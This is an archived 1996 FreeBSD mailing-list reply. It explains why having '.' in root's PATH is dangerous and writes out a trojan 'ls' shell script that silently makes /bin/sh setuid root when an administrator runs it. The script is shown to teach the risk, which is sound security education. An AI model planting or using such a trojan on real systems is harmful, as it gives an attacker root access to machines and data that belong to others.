Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 25 Jun 1996 00:27:00 -0700
From:      "Michael L. VanLoon -- HeadCandy.com" <michaelv@HeadCandy.com>
To:        -Vince- <vince@mercury.gaianet.net>
Cc:        Mark Murray <mark@grumble.grondar.za>, hackers@freebsd.org, security@freebsd.org, Chad Shackley <chad@mercury.gaianet.net>, jbhunt <jbhunt@mercury.gaianet.net>
Subject:   Re: I need help on this one - please help me track this guy down! 
Message-ID:  <199606250727.AAA24988@MindBender.HeadCandy.com>
In-Reply-To: Your message of Mon, 24 Jun 96 23:32:55 -0700. <Pine.BSF.3.91.960624232727.21697c-100000@mercury.gaianet.net>
next in thread | previous in thread | raw e-mail | index | archive | help 

>> 2) The Cracker made a trojan script somewhere (usually exploiting
>>    some admins (roots) who have "." in their path). This way he creates
>>    a script that when run as root will make him a suid program.
>>    after this he has you by tender bits.

>	Hmmm, doesn't everyone have . as their path since all . does is allow
>someone to run stuff from the current directory...

Assume root has "." in its path.  Hacker puts this little script in
his dir, maybe also in /tmp/; it's called "ls" (imagine the
coincidence), and it's executable by all:

	#!/bin/sh
	chown root /bin/sh > /dev/null 2>&1
	chmod u+s,a+x /bin/sh > /dev/null 2>&1
	ls $\*

Then sits back and waits for the sysadmin to come along and type "ls"
in one of those directories.

Pop quiz: what is the result?

-----------------------------------------------------------------------------
  Michael L. VanLoon                                 michaelv@HeadCandy.com
        --<  Free your mind and your machine -- NetBSD free un*x  >--
    NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
        Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
    NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
                  If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199606250727.AAA24988>